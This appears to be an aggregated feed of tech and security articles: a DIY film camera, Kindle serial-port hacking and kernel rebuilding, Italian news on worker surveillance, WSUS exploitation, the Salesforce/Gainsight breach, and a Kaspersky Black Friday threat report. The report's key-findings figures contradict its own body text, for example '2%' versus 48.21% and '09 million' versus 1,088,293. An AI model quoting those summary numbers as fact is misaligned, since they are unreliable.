Medium format cameras have always been a step up from those built in the 35 mm format. By virtue of using a much larger film, they offer improved resolution and performance. If you want a medium format film camera, you can always hunt for some nice vintage gear. Or, you could build one from scratch — like the MRF2 from [IDENTIDEM.design.]

The MRF2 might be a film camera, but in every other way, it’s a thoroughly modern machine. It’s a rangefinder design, relying on a DTS6012M LIDAR time-of-flight sensor to help ensure your shots are always in sharp focus. An ESP32 is responsible for running the show, and it’s hooked up to OLED displays in the viewfinder and on the body to show status info. The lens is coupled with a linear position sensor for capturing accurate shots, there’s a horizon indicator in the viewfinder, and there’s also a nice little frame counter using a rotary encoder to track the film.

Shots from a prototype on Instagram show that this camera can certainly pull off some beautiful shots. We love a good camera build around these parts. You can even make one out of a mouse if you’re so inclined.

youtube.com/embed/_sIWXoqOFIU?…

hackaday.com/2025/11/24/build-…

In the closing hours of JawnCon 0x2, I was making a final pass of the “Free Stuff for Nerds” table when I noticed a forlorn Kindle that had a piece of paper taped to it. The hand-written note explained that the device was in shambles — not only was its e-ink display visibly broken, but the reader was stuck in some kind of endless boot loop. I might have left it there if it wasn’t for the closing remark: “Have Fun!”

Truth is, the last thing I needed was another Kindle. My family has already managed to build up a collection of the things. But taking a broken one apart and attempting to figure out what was wrong with it did seem like it would be kind of fun, as I’d never really had the opportunity to dig into one before. So I brought it home and promptly forgot about it as Supercon was only a few weeks away and there was plenty to keep me occupied.

The following isn’t really a story about fixing a Kindle, although it might seem like it on the surface. It’s more about the experience of working on the device, and the incredible hacking potential of these unassuming gadgets. Whether you’ve got a clear goal in mind, or just want to get your hands dirty in the world of hardware hacking, you could do far worse than picking a couple of busted Kindles up for cheap on eBay.

If there’s a singular takeaway, it’s that the world’s most popular e-reader just so happens to double as a cheap and impressively capable embedded Linux development environment for anyone who’s willing to crack open the case.

Getting Connected

We start with what’s essentially Hardware Hacking 101: the hidden serial debug port. It’s the sort of thing you learn to look for when taking apart a new gadget, and unsurprisingly, it’s also at the heart of Kindle hacking. While there’s plenty of software modifications you can do depending on the age and version of your particular Kindle, opening up the case and tapping into the serial port is always the most direct way to gain access to the system.

From my research, every Kindle (with the possible exception of the very latest models from the 2020s) have an unpopulated serial port on the board. In the case of this Kindle Paperwhite 2 from 2013, it’s even labeled. I simply soldered on some jumper wires and ran them out to a pin header to make connecting to it a little less fiddly. The only thing to watch out for is the voltage; it seems that the serial port on the majority of Kindles is 1.8 V, and connecting up a higher voltage USB-serial adapter without a level shifter could release the Magic Smoke.

With the hardware connected and my favorite serial communications tool running, it was easy to see what ailed this particular Kindle. As evidenced by the final few lines of the kernel messages, a failure of one of the voltage regulators in the MAX77696 — a power management IC designed specifically for e-ink readers — was preventing the driver module from loading fully. This in turn was triggering a reboot, presumably because some sort of watchdog routine was in place to bail out if any critical hardware issues were detected.

On the Hunt

Coming from the “normal” Linux world, the solution seemed easy enough. Since the screen was toast anyway, all I needed to do to get the Kindle booting was to prevent the kernel module from loading. That way I could at least use it for something, perhaps an energy efficient minimalist server.

But according to the MAX77696 datasheet, the chip was responsible for quite a bit more than simply driving the e-ink panel. If I pulled the kernel module entirely, there was a good chance I’d also lose features like the real-time clock and the ability to read the battery voltage as well. So I decided to change tactics: rather than keeping the driver from loading, I’d take out the watchdog that was forcing the system to reboot. But where was it?

Amazon makes it easy to manually download the latest firmware for each member of the Kindle family, and the aptly named KindleTool lets you manipulate them. In this case I used the extract function to pull out the root filesystem image, which I could then locally mount as a basic EXT3 volume.

That was refreshingly straightforward, but unfortunately didn’t get me where I needed to go. Using grep to search all the files within the filesystem for the string “failed to load eink driver” showed no hits. If the watchdog wasn’t in the root filesystem, then where was it?

Unpacking the firmware update with KindleTool also got me the kernel image, and running Binwalk against it showed there was a compressed filesystem at 0x466C. I reasoned this must be an initramfs — essentially a minimal Linux system that lives in RAM and gives the kernel a place to work as it brings up the rest of the system. If the system has some self-check capability, it’s reasonable to assume that’s where it lives.

After drilling down a few times with Binwalk’s extract function, I was able to get to the contents of the initramfs. Sure enough, another search for the error message revealed our sentinel: /bin/recovery-util.

New Kernel, Who Dis?

I had considered trying to simply remove the recovery-util program from the kernel image, but since I wasn’t 100% sure how the whole watchdog system functioned, there was no guarantee that would have worked without more trial and error. So, emboldened by how well this was all going for me so far, I took the nuclear option and decided to rebuild the kernel with my own initramfs.

It’s here that the Kindle software environment, and the community around it, really started to shine. Once again, Amazon made it ridiculously easy to get the source code for the exact firmware I was working with, and the community provided an actively maintained toolchain to build it with. A little more searching even pulled up some pre-compiled builds that were ready to use.

Actually building the kernel for the Kindle was essentially the same process as doing it on my desktop computer, with the notable addition of supplying the location of the cross compiler into each make command. But if I ever got off track, there were plenty of write-ups online to reference. I even found one that went over building a custom initramfs with BusyBox that doesn’t include any of Amazon’s programs.

But perhaps the best part was that, once I had compiled Amazon’s modified kernel and built my initramfs, installing it on the Kindle was as simple as using a modified version of Android’s fastboot command. There were no cryptographic hoops to jump through, you just give it the new kernel and away it went. It’s my understanding that newer Kindles might not be so understanding, but with at least the hardware of this vintage, there’s nothing stopping you from doing whatever you want.

Pocket Penguin Playground

With the source code, tools, and knowledge floating around out there, I was able to build my own kernel and initramfs that lets me boot into a full Linux environment on what was previously a non-functional Kindle. There are a few things I haven’t gotten to work yet, but I believe that’s largely because I’m still using the root filesystem provided by Amazon.

Now that I know how easy it is to work with Linux on the Kindle, I’m looking to push further and put together my own stripped-down environment without any of Amazon’s frameworks installed. Given how ridiculously cheap early Kindles are on the second hand market — especially if they have a busted screen — there are all sorts of tasks that I could see them performing if I had a solid base to build on.

Make no mistake, I’m greatly appreciative of the fact that we now have mature single-board computers like the Raspberry Pi available for a reasonable cost. But taking what’s essentially consumer e-waste and turning it into a useful platform for learning and experimentation is the true hacker way. So whether you’ve got a Kindle collecting dust somewhere at home, or end up grabbing a few off of eBay for a song, I invite you to bust out the USB-serial adapter and start exploring.

Il lavoro da remoto ha dato libertà ai dipendenti, ma con essa è arrivata anche la sorveglianza digitale.

Ne abbiamo parlato qualche tempo fa in un articolo riportando che tali strumenti di monitoraggio stanno arrivando anche all’interno di Microsoft teams. Pertanto, al posto dello sguardo fisso del capo, questo ruolo verrà sempre più svolto dagli “algoritmi” che monitoreranno per quanto tempo le applicazioni rimangono aperte, quali siti web vengono visitati e con quanta attività viene mosso il mouse e premuto i tasti.

Sistemi avanzati analizzano persino le espressioni facciali e il modo in cui i dipendenti camminano davanti a una webcam. Ma questi strumenti sottolineando al tempo stesso i limiti intrinseci della raccolta di dati personali.

Tuttavia, per molti lavoratori, tale monitoraggio non è visto come una preoccupazione, ma come una sfiducia e una violazione della privacy. Sondaggi e dati dell’American Psychological Association collegano la sorveglianza costante a un aumento dello stress, a un peggioramento del benessere psico-emotivo e al desiderio di lasciare il lavoro.

La necessità di trasmettere immagini da webcam o informazioni mediche sensibili è particolarmente pressante. Le persone chiedono spiegazioni chiare sul motivo per cui i dati vengono raccolti e con chi possono essere condivisi.

Lo sguardo gelido degli algoritmi non è meno pericoloso. I programmi mancano di contesto e scambiano facilmente telefonate o documenti per inattività. Questo porta i dipendenti a fingere un’attività frenetica per il bene degli indicatori di performance, e gli esperti del National Employment Law Project degli Stati Uniti hanno documentato casi di sanzioni ingiustificate e difficili da contestare quando la decisione viene effettivamente presa dal sistema.

Nei magazzini e nella logistica, dove ogni movimento è digitalizzato, la pressione è particolarmente intensa: la fretta di rispettare gli standard si traduce in dolore fisico, affaticamento e burnout. Secondo NELP, la sorveglianza digitale ha anche un impatto sui diritti dei lavoratori, ostacolando l’organizzazione dei lavoratori e fornendo alle aziende uno strumento per la rilevazione precoce dell’attività sindacale, con il pretesto di analizzare altri parametri.

Le regole del gioco stanno cambiando lentamente. Negli Stati Uniti, i datori di lavoro sono tenuti a fornire un avviso sulla raccolta dei dati, ma questi requisiti sono limitati, quindi gli stati stanno cercando di introdurre misure di salvaguardia proprie. La California sta discutendo di vietare i sistemi che riconoscono emozioni, andatura o espressioni facciali e trasmettono dati a terzi.

Nel frattempo, il Massachusetts sta promuovendo una legislazione che proteggerebbe i lavoratori dall’abuso della sorveglianza digitale. Nel frattempo, le autorità federali stanno cercando un approccio unificato alla regolamentazione dell’intelligenza artificiale, il che potrebbe indebolire le iniziative locali. Pertanto, l’interesse per la contrattazione collettiva come mezzo valido per combattere la sorveglianza eccessiva sta crescendo.

I sostenitori di un approccio più cauto insistono sul fatto che tali strumenti siano significativi solo quando aiutano a identificare le tendenze generali e a migliorare i processi, piuttosto che trasformare le persone in parametri. Dove rispetto, autonomia e condizioni di lavoro sicure permangono, la produttività emerge in modo naturale, senza una telecamera onnipresente che controlla ogni mossa.

L'articolo La Sorveglianza Digitale sui Lavoratori sta Arrivando: Muovi il Mouse più Veloce! proviene da Red Hot Cyber.

Una vulnerabilità recentemente corretta nei servizi di aggiornamento di Windows Server di Microsoft ha portato a una serie di attacchi utilizzando uno degli strumenti di spionaggio più noti degli ultimi anni.

Gli incidenti dimostrano la rapidità con cui gli aggressori possono passare dallo studio di un exploit pubblicato allo sfruttamento attivo della vulnerabilità per penetrare nell’infrastruttura.

Secondo l’azienda sudcoreana AhnLab, un gruppo sconosciuto ha ottenuto l’accesso ai server Windows che eseguivano WSUS sfruttando la vulnerabilità CVE-2025-59287. Questa vulnerabilità è stata sfruttata per eseguire utilità di sistema standard, consentendo agli aggressori di contattare un server esterno e scaricare codice dannoso.

Prima di installare lo strumento principale, è stata utilizzata l’utilità PowerCat, che ha fornito agli aggressori un prompt dei comandi remoto. Quindi, utilizzando certutil e curl, è stato installato ShadowPad sul sistema.

Questo programma è considerato uno sviluppo di PlugX ed è da tempo utilizzato da entità collegate alla Cina. La sua architettura è modulare e viene avviato tramite sostituzione di libreria.

Un file DLL, situato in memoria e responsabile dell’esecuzione del contenuto principale, viene caricato nel file legittimo ETDCtrlHelper.exe. Al suo interno viene implementato un modulo che carica componenti aggiuntivi e utilizza meccanismi stealth e di persistenza.

Microsoft ha corretto CVE-2025-59287 un mese fa. Il bug è classificato come critico perché consente l’esecuzione di codice arbitrario con privilegi di sistema. Dopo il rilascio di un exploit dimostrativo, molti gruppi hanno iniziato a scansionare in massa i server WSUS accessibili, ottenendo l’accesso iniziale, effettuando ricognizioni e scaricando sia file dannosi che strumenti di amministrazione legittimi. Secondo AhnLab, è in questo modo che ShadowPad è stato distribuito sui server.

L’incidente ha chiaramente dimostrato che ogni vulnerabilità diventa una minaccia reale se la sua risoluzione viene ritardata. Quanto più rapidamente vengono affrontati i problemi identificati, tanto minore è la probabilità che gli aggressori riescano a infiltrarsi nell’infrastruttura e a trasformare un guasto in una crisi conclamata.

L'articolo Microsoft corregge il bug su WSUS, ma gli hacker Cinesi arrivano prima proviene da Red Hot Cyber.

La crescente fuga di dati dall’ecosistema Salesforce ha preso una nuova piega dopo che il gruppo ShinyHuntersha annunciato il suo coinvolgimento nell’incidente. Gli eventi sono in corso da diversi mesi, interessando diversi servizi correlati alle piattaforme CRM, e la portata dell’impatto continua a crescere.

ShinyHunters afferma di aver ottenuto l’accesso a Gainsight diversi mesi fa, sfruttando le funzionalità acquisite tramite un hack dell’integrazione di Salesloft Drift. All’epoca, individui sconosciuti si erano infiltrati nell’account GitHub di Salesloft ed estraevano i token OAuth utilizzati dal servizio di terze parti Drift con Salesforce. Questi token hanno permesso loro di accedere furtivamente ai dati di un gran numero di clienti aziendali.

Secondo quanto riferito, la stessa campagna ha compromesso anche Gainsight. Questo servizio opera come piattaforma di gestione dei processi dei clienti ed è connesso a Salesforce, HubSpot e sistemi di supporto come Zendesk.

L’incidente ha spinto l’azienda a contattare gli specialisti di Google Mandiant per indagare sulla natura dell’attività e sull’origine del problema. Gainsight sostiene che l’attività indesiderata si sia verificata tramite connessioni ad applicazioni esterne, non a causa di un bug nella piattaforma Salesforce stessa.

In risposta, Salesforce ha revocato tutte le chiavi di accesso attive per le app Gainsight e le ha temporaneamente rimosse da AppExchange. Zendesk e HubSpot hanno adottato misure simili, limitando la funzionalità dei rispettivi connettori in attesa di una revisione interna. I rappresentanti di Salesforce hanno rifiutato di commentare nei dettagli, ma hanno sottolineato che le misure sono state adottate immediatamente.

Secondo il Google Threat Intelligence Group, l’attacco è collegato al gruppo UNC6240, noto anche come ShinyHunters. L’azienda ha identificato oltre duecento istanze Salesforce interessate. Si ritiene che la fonte della compromissione siano i token OAuth rubati, che hanno consentito agli aggressori di accedere a servizi di terze parti e alle relative integrazioni.

I membri di ShinyHunters affermano di aver verificato il livello di monitoraggio nei sistemi di Gainsight e che l’attività illegale è stata rilevata circa una o due settimane dopo l’inizio delle intrusioni. Il gruppo afferma inoltre di cercare complici all’interno di grandi aziende. Salesforce aveva precedentemente dichiarato che non avrebbe acconsentito alle richieste degli estorsori e non avrebbe negoziato.

L'articolo ShinyHunters cerca impiegati infedeli mentre il caso Gainsight Salesforce si estende proviene da Red Hot Cyber.

IT'S MONDAY, AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and am wishing everyone a happy Thanksgiving later this week. For those who don't do 'Turkey Day,' a reminder: it's a month until Festivus.

— The United States takes over the G20 presidency in 2026. On tech, it's time other countries stepped up to fill the void.

— Washington wants to stop US states from passing AI legislation despite Alabama to Wisconsin becoming a testing ground for digital rulemaking.

— Internet freedoms worldwide have declined progressively over the last 15 years.

Let's get started

digitalpolitics.co/newsletter0…

The global e‑commerce market is accelerating faster than ever before, driven by expanding online retail, and rising consumer adoption worldwide. According to McKinsey Global Institute, global e‑commerce is projected to grow by 7–9% annually through 2040.

At Kaspersky, we track how this surge in online shopping activity is mirrored by cyber threats. In 2025, we observed attacks which targeted not only e‑commerce platform users but online shoppers in general, including those using digital marketplaces, payment services and apps for everyday purchases. This year, we additionally analyzed how cybercriminals exploited gaming platforms during Black Friday, as the gaming industry has become an integral part of the global sales calendar. Threat actors have been ramping up their efforts during peak sales events like Black Friday, exploiting high demand and reduced user vigilance to steal personal data, funds, or spread malware.

This report continues our annual series of analyses published on Securelist in 2021, 2022, 2023, and 2024, which examine the evolving landscape of shopping‑related cyber threats.

Methodology

To track how the shopping threat landscape continues to evolve, we conduct an annual assessment of the most common malicious techniques, which span financial malware, phishing pages that mimic major retailers, banks, and payment services, as well as spam campaigns that funnel users toward fraudulent sites. In 2025, we also placed a dedicated focus on gaming-related threats, analyzing how cybercriminals leverage players’ interest. The threat data we rely on is sourced from the Kaspersky Security Network (KSN), which processes anonymized cybersecurity data shared consensually by Kaspersky users. This report draws on data collected from January through October 2025.

Key findings

• In the first ten months of 2025, Kaspersky identified nearly 4 million phishing attacks which targeted users of online stores, payment systems, and banks.
• As many as 2% of these attacks were directed at online shoppers.
• We blocked more than 146,000 Black Friday-themed spam messages in the first two weeks of November.
• Kaspersky detected more than 2 million phishing attacks related to online gaming.
• Around 09 million banking-trojan attacks were recorded during the 2025 Black Friday season.
• The number of attempted attacks on gaming platforms surged in 2025, reaching more than 20 million, a significant increase compared to previous years.
• More than 18 million attempted malicious attacks were disguised as Discord in 2025, a more than 14-time increase year-over-year, while Steam remained within its usual five-year fluctuation range.

Shopping fraud and phishing

Phishing and scams remain among the most common threats for online shoppers, particularly during high-traffic retail periods when users are more likely to act quickly and rely on familiar brand cues. Cybercriminals frequently recreate the appearance of legitimate stores, payment pages, and banking services, making their fraudulent sites and emails difficult to distinguish from real ones. With customers navigating multiple offers and payment options, they may overlook URL or sender details, increasing the likelihood of credential theft and financial losses.

From January through to October 2025, Kaspersky products successfully blocked 6,394,854 attempts to access phishing links which targeted users of online stores, payment systems, and banks. Breaking down these attempts, 48.21% had targeted online shoppers (for comparison, this segment accounted for 37.5% in 2024), 26.10% targeted banking users (compared to 44.41% in 2024), and 25.69% mimicked payment systems (18.09% last year). Compared to previous years, there has been a noticeable shift in focus, with attacks against online store users now representing a larger share, reflecting cybercriminals’ continued emphasis on exploiting high-demand retail periods, while attacks on banking users have decreased in relative proportion. This may be related to online banking protection hardening worldwide.

Financial phishing attacks by category, January–October 2025 (download)

In 2025, Kaspersky products detected and blocked 606,369 phishing attempts involving the misuse of Amazon’s brand. Cybercriminals continued to rely on Amazon-themed pages to deceive users and obtain personal or financial information.

Other major e-commerce brands were also impersonated. Attempts to visit phishing pages mimicking Alibaba brands, such as AliExpress, were detected 54,500 times, while eBay-themed pages appeared in 38,383 alerts. The Latin American marketplace Mercado Libre was used as a lure in 8,039 cases, and Walmart-related phishing pages were detected 8,156 times.

Popular online stores mimicked by scammers, January–October 2025 (download)

In 2025, phishing campaigns also extensively mimicked other online platforms. Netflix-themed pages were detected 801,148 times, while Spotify-related attempts reached 576,873. This pattern likely reflects attackers’ continued focus on high-traffic digital entertainment services with in-service payments enabled, which can be monetized via stolen accounts.

How scammers exploited shopping hype in 2025

In 2025, Black Friday-related scams continued to circulate across multiple channels, with fraudulent email campaigns remaining one of the key distribution methods. As retailers increase their seasonal outreach, cybercriminals take advantage of the high volume of promotional communications by sending look-alike messages that direct users to scam and phishing pages. In the first two weeks of November, 146,535 spam messages connected to seasonal sales were detected by Kaspersky, including 2,572 messages referencing Singles day sales.

Scammers frequently attempt to mimic well-known platforms to increase the credibility of their messages. In one of the recurring campaigns, a pattern seen year after year, cybercriminals replicated Amazon’s branding and visual style, promoting supposedly exclusive early-access discounts of up to 70%. In this particular case, the attackers made almost no changes to the text used in their 2024 campaign, again prompting users to follow a link leading to a fraudulent page. Such pages are usually designed to steal their personal or payment information or to trick the user into buying non-existent goods.

Beyond the general excitement around seasonal discounts, scammers also try to exploit consumers’ interest in newly released Apple devices. To attract attention, they use the same images of the latest gadgets across various mailing campaigns, just changing the names of legitimate retailers that allegedly sell the brand.

Scammers use an identical image across different campaigns, only changing the retailer’s branding

As subscription-based streaming platforms also take part in global sales periods, cybercriminals attempt to take advantage of this interest as well. For example, we observed a phishing website where scammers promoted an offer for a “12-month subscription bundle” covering several popular services at once, asking users to enter their bank card details. To enhance credibility, the scammers also include fabricated indicators of numerous successful purchases from other “users,” making the offer appear legitimate.

In addition to imitating globally recognized platforms, scammers also set up fake pages that pretend to be local services in specific countries. This tactic enables more targeted campaigns that blend into the local online landscape, increasing the chances that users will perceive the fraudulent pages as legitimate and engage with them.

Non-existent Norwegian online store and popular Labubu toys sale

Banking Trojans

Banking Trojans, or “bankers,” are another tool for cybercriminals exploiting busy shopping seasons like Black Friday in 2025. They are designed to steal sensitive data from online banking and payment systems. In this section, we’ll focus on PC bankers. Once on a victim’s device, they monitor the browser and, when the user visits a targeted site, can use techniques like web injection or form-grabbing to capture login credentials, credit card information, and other personal data. Some trojans also watch the clipboard for crypto wallet addresses and replace them with those controlled by the malicious actors.

As online shopping peaks during major sales events, attackers increasingly target e-commerce platforms alongside banks. Trojans may inject fake forms into legitimate websites, tricking users into revealing sensitive data during checkout and increasing the risk of identity theft and financial fraud. In 2025, Kaspersky detected over 1,088,293* banking Trojan attacks. Among notable banker-related cases analysed by Kaspersky throughout the year, campaigns involving the new Maverick banking Trojan distributed via WhatsApp, as well as the Efimer Trojan which spread through malicious emails and compromised WordPress sites can be mentioned, both illustrating how diverse and adaptive banking Trojan delivery methods are.

*These statistics include globally active banking malware, and malware for ATMs and point-of-sale (PoS) systems. We excluded data on Trojan-banker families that no longer use banking Trojan functionality in their attacks, such as Emotet.

A holiday sales season on the dark web

Apparently, even the criminal underground follows its own version of a holiday sales season. Once data is stolen, it often ends up on dark-web forums, where cybercriminals actively search for buyers. This pattern is far from new, and the range of offers has remained largely unchanged over the past two years.

Threat actors consistently seize the opportunity to attract “new customers,” advertising deep discounts tied to high-profile global sales events. It is worth noting that year after year we see the same established services announce their upcoming promotions in the lead-up to Black Friday, almost as if operating on a retail calendar of their own.

We also noted that dark web forum participants themselves eagerly await these seasonal markdowns, hoping to obtain databases at the most favorable rates and expressing their wishes in forum posts. In the months before Black Friday, posts began appearing on carding-themed forums advertising stolen payment-card data at promotional prices.

Threats targeting gaming

The gaming industry faces a high concentration of scams and other cyberthreats due to its vast global audience and constant demand for digital goods, updates, and in-game advantages. Players often engage quickly with new offers, making them more susceptible to deceptive links or malicious files. At the same time, the fact that gamers often download games, mods, skins etc. from third-party marketplaces, community platforms, and unofficial sources creates additional entry points for attackers.

The number of attempted attacks on platforms beloved by gamers increased dramatically in 2025, reaching 20,188,897 cases, a sharp rise compared to previous years.

Attempts to attack users through malicious or unwanted files disguised as popular gaming platforms (download)

The nearly sevenfold increase in 2025 is most likely linked to the Discord block by some countries introduced at the end of 2024. Eventually users rely on alternative tools, proxies and modified clients. This change significantly expanded the attack surface, making users more vulnerable to fake installers, and malicious updates disguised as workarounds for the restriction.

It can also be seen in the top five most targeted gaming platforms of 2025:

In previous years, Steam consistently ranked as the platform with the highest number of attempted attacks. Its extensive game library, active modding ecosystem, and long-standing role in the gaming community made it a prime target for cybercriminals distributing malicious files disguised as mods, cheats, or cracked versions. In 2025, however, the landscape changed significantly. The gap between Steam and Discord expanded to an unprecedented degree as Steam-related figures remained within their typical fluctuation range of the past five years, while the number of attempted Discord-disguised attacks surged more than 14 times compared to 2024, reshaping the hierarchy of targeted gaming platforms.

Attempts to attack users through malicious or unwanted files disguised as Steam and Discord throughout the reported period (download)

From January to October, 2025, cybercriminals used a variety of cyberthreats disguised as popular related to gamers platforms, modifications or circumvention options. RiskTool dominated the threat landscape with 17,845,099 detections, far more than any other category. Although not inherently malicious, these tools can hide files, mask processes, or disable programs, making them useful for stealthy, persistent abuse, including covert crypto-mining. Downloaders ranked second with 1,318,743 detections. These appear harmless but may fetch additional malware among other downloaded files. Downloaders are typically installed when users download unofficial patches, cracked clients, or mods. Trojans followed with 384,680 detections, often disguised as cheats or mod installers. Once executed, they can steal credentials, intercept tokens, or enable remote access, leading to account takeovers and the loss of in-game assets.

Phishing and scam threats targeting gamers

In addition to tracking malicious and unwanted files disguised as gamers’ platforms, Kaspersky experts also analysed phishing pages which impersonated these services. Between January and October 2025, Kaspersky products detected 2,054,336 phishing attempts targeting users through fake login pages, giveaway offers, “discounted” subscriptions and other scams which impersonated popular platforms like Steam, PlayStation, Xbox and gaming stores.

Example of Black Friday scam using a popular shooter as a lure

The page shown in the screenshot is a typical Black Friday-themed scam that targets gamers, designed to imitate an official Valorant promotion. The “Valorant Points up to 80% off” banner, polished layout, and fake countdown timer create urgency and make the offer appear credible at first glance. Users who proceed are redirected to a fake login form requesting Riot account credentials or bank card details. Once submitted, this information enables attackers to take over accounts, steal in-game assets, or carry out fraudulent transactions.

Minor text errors reveal the page’s fraudulent nature. The phrase “You should not have a size limit of 5$ dollars in your account” is grammatically incorrect and clearly suspicious.

Another phishing page relies on a fabricated “Winter Gift Marathon” that claims to offer a free $20 Steam gift card. The seasonal framing, combined with a misleading counter (“251,110 of 300,000 cards received”), creates an artificial sense of legitimacy and urgency intended to prompt quick user interaction.

The central component of the scheme is the “Sign in” button, which redirects users to a spoofed Steam login form designed to collect their credentials. Once obtained, attackers can gain full access to the account, including payment methods, inventory items, and marketplace assets, and may be able to compromise additional services if the same password is used elsewhere.

Examples of scams on Playstation 5 Pro and Xbox series X

Scams themed around the PlayStation 5 Pro and Xbox Series X appear to be generated from a phishing kit, a reusable template that scammers adapt for different brands. Despite referencing two consoles, both pages follow the same structure which features a bold claim offering a chance to “win” a high-value device, a large product image on the left, and a minimalistic form on the right requesting the user’s email address.

A yellow banner promotes an “exclusive offer” with “limited availability,” pressuring users to respond quickly. After submitting an email, victims are typically redirected to additional personal and payment data-collection forms. They also may later be targeted with follow-up phishing emails, spam, or malicious links.

Conclusions

In 2025, the ongoing expansion of global e-commerce continued to be reflected in the cyberthreat landscape, with phishing, scam activity, and financial malware targeting online shoppers worldwide. Peak sales periods once again created favorable conditions for fraud, resulting in sustained activity involving spoofed retailer pages, fraudulent email campaigns, and seasonal spam.

Threat actors also targeted users of digital entertainment and subscription services. The gaming sector experienced a marked increase in malicious activity, driven by shifts in platform accessibility and the widespread use of third-party tools. The significant rise in malicious detections associated with Discord underscored how rapidly attackers adjust to changes in user behavior.

Overall, 2025 demonstrated that cybercriminals continue to leverage predictable user behavior patterns and major sales events to maximize the impact of their operations. Consumers should remain especially vigilant during peak shopping periods and use stronger security practices, such as two-factor authentication, secure payment methods, and cautious browsing. A comprehensive security solution that blocks malware, detects phishing pages, and protects financial data can further reduce the risk of falling victim to online threats.

securelist.com/black-friday-th…

The Bomem DA3 is a type of Fourier transform spectrometer used for measuring various spectral data and [Usagi Electric] has one. On his quest to understand it he runs down a number of rabbit holes, including learning about various barcode formats, doing a teardown of the Telxon LS-201 barcode scanner, and exploring how lasers work. That’s right: lasers!

His reason for looking at the Telxon LS-201 barcode scanner is that it has the same type of helium-neon laser as his Bomem DA3 uses. Since he’s learning about barcode scanners he thinks it’s prudent to learn about barcode formats too, and he has a discussion with our very own Adam Fabio about such things, including the UPC-A standard barcodes.

It’s fun seeing the mainboard of the Telxon LS-201 sporting the familiar 555 timer, LM393 comparator, and three op-amps: 5532, LF347, and TL062; no discrete logic in sight! If you’re interested in barcode tech you might like to read Barcodes Enter The Matrix In 2027 and Old Barcode Scanner Motherboards Live Again. The particular Hackaday article mentioned in the video is this one: The Eloquence Of The Barcode.

Also, in the interest of public health and safety, make sure you’re wearing laser protection glasses if you’re working with laser technology. Even low power lasers can do damage to your eyes. Laser emissions can be invisible to the human eye and you don’t have nerves that tell you when your eyeballs are being roasted, so take care out there!

youtube.com/embed/YVBJg0J1v1s?…

hackaday.com/2025/11/24/barcod…